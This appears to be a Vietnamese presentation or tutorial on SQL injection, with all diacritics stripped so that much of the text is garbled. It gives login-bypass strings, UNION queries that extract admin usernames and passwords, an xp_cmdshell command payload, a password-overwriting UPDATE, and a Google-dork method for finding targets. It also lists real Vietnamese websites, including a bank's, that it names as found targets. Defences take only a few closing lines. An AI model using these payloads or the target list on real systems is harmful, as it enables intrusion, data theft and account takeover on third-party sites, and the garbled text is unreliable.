SQL Injection l g? Cc dng tn cng bng SQL Injection K Thut tn cng bng sql injection Cch phng trnh Demo
SQL Injection l g? SQL injection l mt k thut tn cng li dng l hng trong vic kim tra d liu nhp trong cc ng dng web v cc thng bo li ca h qun tr c s d liu "tim vo" (injection) v thi hnh cc cu lnh SQL bt hp php. Hu qu ca n rt tai hi v n cho php nhng k tn cng c th thc hin cc thao tc xa, hiu chnh, do c ton quyn trn c s d liu ca ng dng, thm ch l server m ng dng ang chy. Li ny thng xy ra trn cc ng dng web c d liu c qun l bng cc h qun tr c s d liu nh SQL Server, MySQL, Oracle, DB2, Sysbase. Cc dng tn cng bng SQL Injection C bn dng thng thng bao gm: Vt qua kim tra lc ng nhp (authorization bypass) S dng cu ln SELECT S dng cu lnh INSERT S dng cc stored-procedures [2], [3] Dng tn cng vt qua kim tra ng nhp ng nhp nh vo li khi dng cc cu lnh SQL thao tc trn c s d liu ca ng dng web. Trong trng hp ny, ngi ta c th dng hai trang, mt trang HTML hin th form nhp liu v mt trang ASP dng x l thng tin nhp t pha ngi dng. V d: login.htm
Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." If (objRS.EOF) Then Response.Write "Invalid login." Else Response.Write "You are logged in as " & objRS("USR_NAME") End If Set objRS = Nothing %> Ngi dng nhp chui sau vo trong c 2 nhp liu username/password ca trang login.htm l: ' OR ' ' = ' . Lc ny, cu truy vn s c gi thc hin l: SELECT * FROM T_USERS WHERE USR_NAME ='' OR ''='' and USR_PASSWORD= '' OR ''='' Cu truy vn ny l hp l v s tr v tt c cc bn ghi ca T_USERS v on m tip theo x l ngi dng ng nhp bt hp php ny nh l ngi dng ng nhp hp l. Dng tn cng s dng cu lnh SELECT thc hin c kiu tn cng ny, k tn cng phi c kh nng hiu v li dng cc s h trong cc thng bo li t h thng d tm cc im yu khi u cho vic tn cng. Thng thng, s c mt trang nhn ID ca tin cn hin th ri sau truy vn ni dung ca tin c ID ny. <% Dim vNewsID, objRS, strSQL vNewsID = Request("ID") strSQL = "SELECT * FROM T_NEWS WHERE NEWS_ID =" & vNewsID Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." Set objRS = Nothing %> Cu truy vn SQL lc ny s tr v tt c cc article t bng d liu v n s thc hin cu lnh: SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1 ' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE ' '=' (*) Lc ny, ngoi cu truy vn u khng thnh cng, chng trnh s thc hin thm lnh tip theo sau t kha UNION na. Nu chng ta thm ' UNION SELECT name FROM sysobjects WHERE xtype = 'U' l c th lit k c tn tt c cc bng d liu. Dng tn cng s dng cu lnh INSERT Chc nng khng th thiu l sau khi ng k thnh cng, ngi dng c th xem v hiu chnh thng tin ca mnh. SQL injection c th c dng khi h thng khng kim tra tnh hp l ca thng tin nhp vo. V d, mt cu lnh INSERT c th c c php dng: INSERT INTO TableName VALUES('Value One', 'Value Two', 'Value Three'). Nu on m xy dng cu lnh SQL c dng : <% strSQL = "INSERT INTO TableName VALUES(' " & strValueOne & " ', ' " _ & strValueTwo & " ', ' " & strValueThree & " ') " Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." Set objRS = Nothing %> Dng tn cng s dng stored- procedures Vic tn cng bng stored-procedures s gy tc hi rt ln nu ng dng c thc thi vi quyn qun tr h thng 'sa'. V d, nu ta thay on m tim vo dng: ' ; EXEC xp_cmdshell 'cmd.exe dir C: '. Lc ny h thng s thc hin lnh lit k th mc trn a C:\ ci t server. Vic ph hoi kiu no tu thuc vo cu lnh ng sau cmd.exe. K Thut tn cng bng sql injection Bc 1: Tm kim mc tiu. Bc 2: Kim tra ch yu ca trang web Bc 3: Nhn data qua database using ODBC error message Bc 4: Xc nh tn ca cc column trong table Bc 5: Thu thp cc d liu quan trng. Bc 6: X l kt qu tm c
Tm kim mc tiu Bn c th dng cc bt k mt search-engine no trn mng nh cc trang login, search, feedback Bn c th custome Search Engine li cho ph hp vi yu cu ca bn
Thc hin cu lnh search: inurl:php?id= site:com.vn
y l kt qu thu c. Kt Qu Tm c Ca Nhm http://www.vsmc.com.vn/news_detail.php?id=19' http://www.toeic.com.vn/info/details.php?id=383' http://www.phanhoadigi.com.vn/list_product.php?ID=1173&namecate=EO S' http://forum.key.com.vn/viewtopic.php?id=362 http://www.biconsi.com.vn/index.php?id=36' http://www.vietphone.com.vn/download.php?mode=download&id=19' http://thammyvienthanhbinh.com.vn/detail.php?id=19' http://www.voip.com.vn/download.php?mode=download&id=28'
http://bidv.com.vn/advert.asp?id=36' http://www.licogi.com.vn/home.asp?ID=234&Langid=2%27 http://www.galilcol.ac.il/page.asp?id=17 Ghi ch: khng phi trang no cng tn cng c Kim tra ch yu ca trang web Bn c th in thm mt s lnh trn url, hoc trn cc from login, search, hoc search pht hin li. Sau y l mt s cch thm v pht hin li ca nhm mnh: Nhn data qua database using ODBC error message y l bc quan trng nht v i hi nhiu k thut ln s am hiu v c s d liu. Table INFORMATION_SCHEMA.COLUMNS cha tn ca tt c cc column trong table. Bn c th khai thc nh sau: http://vitcon/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SHEMA.COLUMNS WHERE TABLE_NAME=admin_login-- Out put: Microsoft OLE DB Provider for ODBC Drivers error 80040e07[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator. /index.asp, line 5 Thu thp cc d liu quan trng Chng ta phi xc nh c cc tn ca cc table v column quan trng. Chng ta c th ly login_name u tin trong table admin_login nh sau: http://vitcon/index.asp?id=10 UNION SELECT TOP 1 login_name From admin_login
Bn d dng nhn ra c admin user u tin c login_name l aaa. Sau dung tn user tm c tm password: http://vitcon/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login _name=aaa By gi bn s nhn c password ca aaa l bbb.
X l kt qu tm c Khi bn c tn ca tt c cc column trong table, bn c th UPDATE hoc INSERT mt record mi vo table ny. thay i password ca aaa bn c th lm nh sau: http://vitcon/index.asp?id=10 ;UPDATE admin_login SET password =ccc WHERE login_name=aaa Hoc bn login trc tip vo v thc hin di quyn user . Cch phng trnh Cn c c ch kim sot cht ch v gii hn quyn x l d liu n ti khon ngi dng m ng dng web ang s dng. Cc ng dng thng thng nn trnh dng n cc quyn nh dbo hay sa. Quyn cng b hn ch, thit hi cng t. Loi b bt k thng tin k thut no cha trong thng ip chuyn xung cho ngi dng khi ng dng c li. Cc thng bo li thng thng tit l cc chi tit k thut c th cho php k tn cng bit c im yu ca h thng. DEMO